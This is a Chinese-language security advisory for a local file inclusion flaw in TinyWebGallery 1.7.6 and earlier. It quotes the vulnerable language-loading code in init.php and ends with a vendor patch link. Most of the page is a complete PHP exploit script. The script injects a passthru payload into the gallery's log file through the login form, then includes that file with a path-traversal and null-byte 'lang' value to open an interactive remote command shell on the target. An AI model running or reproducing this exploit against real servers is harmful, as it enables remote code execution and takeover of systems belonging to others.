影响版本:
TinyWebGallery <= 1.7.6 LFI
程序介绍:
TinyWebGallery是基于php的开源相册。
漏洞分析:
TinyWebGallery的/admin/_include/init.php模块没有正确地验证用户请求中的$_GET[‘lang’]参数:
110. // Get Language
111. if (isset($GLOBALS[‘__GET’]["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS[‘__GET’]["lang"];
112. elseif (isset($GLOBALS[‘__POST’]["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS[‘__POST’]["lang"];
113. else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];
114. else $GLOBALS["language"] = $GLOBALS["default_language"];
115.
[…]
138.
139. // ——————————————————————————
140. // Necessary files
141. require _QUIXPLORER_PATH . "/_config/conf.php";
142.
143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
144. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
146. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
147. else
148. require _QUIXPLORER_PATH . "/_lang/en.php";
远程攻击者可以通过在144行的require函数包含任意文件。成功攻击要求magic_quotes_gpc = off。
漏洞利用:
- <?php
- error_reporting(0);
- set_time_limit(0);
- ini_set("default_socket_timeout", 5);
- function http_send($host, $packet)
- {
- if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
- die("\nsocket_create(): " . socket_strerror($s) . "\n");
- if (socket_connect($s, $host, 80) == false)
- die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
- socket_write($s, $packet, strlen($packet));
- while ($m = socket_read($s, 2048)) $response .= $m;
- socket_close($s);
- return $response;
- }
- function check_target()
- {
- global $host, $path;
- $packet = "GET {$path}info.php?showphpinfo=true HTTP/1.0";
- $packet .= "Host: {$host}";
- $packet .= "Connection: close";
- preg_match(‘/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/’, http_send($host, $packet), $match);
- if ($match[1] != "Off") die("\n[-] Exploit failed…magic_quotes_gpc = on\n");
- }
- function inject_code()
- {
- global $host, $path;
- $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
- $payload = "p_user={$code}&p_pass=";
- $packet = "POST {$path}admin/index.php?action=login HTTP/1.0";
- $packet .= "Host: {$host}";
- $packet .= "Content-Length: ".strlen($payload)."";
- $packet .= "Content-Type: application/x-www-form-urlencoded";
- $packet .= "Connection: close";
- $packet .= $payload;
- http_send($host, $packet);
- }
- print "\n+———————————————————————+";
- print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
- print "\n+———————————————————————+\n";
- if ($argc < 3)
- {
- print "\nUsage……: php $argv[0] host path\n";
- print "\nExample….: php $argv[0] localhost /";
- print "\nExample….: php $argv[0] localhost /twg/\n";
- die();
- }
- $host = $argv[1];
- $path = $argv[2];
- check_target();
- inject_code();
- $packet = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0";
- $packet .= "Host: {$host}";
- $packet .= "Cmd: %s";
- $packet .= "Connection: close";
- while (1)
- {
- print "\ntwg-shell# ";
- if (($cmd = trim(fgets(STDIN))) == "exit") break;
- $response = http_send($host, sprintf($packet, base64_encode($cmd)));
- preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed…\n");
- }
- ?>
解决方案:
厂商补丁:
Michael Dempfle
—————
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.tinywebgallery.com/download.php?tinywebgallery=latest
0 条评论。